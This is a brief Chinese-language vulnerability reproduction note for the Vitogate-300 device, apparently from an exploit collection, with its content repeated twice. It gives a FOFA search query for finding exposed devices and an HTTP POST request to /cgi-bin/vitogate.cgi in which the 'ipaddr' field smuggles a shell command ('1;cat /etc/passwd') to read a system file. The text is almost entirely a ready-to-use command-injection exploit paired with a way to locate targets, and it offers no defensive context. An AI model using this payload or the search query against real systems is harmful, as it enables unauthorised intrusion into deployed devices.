0x01.fofa语句
app="Vitogate-300"
0x02.漏洞复现
POST /cgi-bin/vitogate.cgi HTTP/1.1
Host:
Content-Type: application/json
{"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"1;cat /etc/passwd"}}
app="Vitogate-300"
POST /cgi-bin/vitogate.cgi HTTP/1.1
Host:
Content-Type: application/json
{"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"1;cat /etc/passwd"}}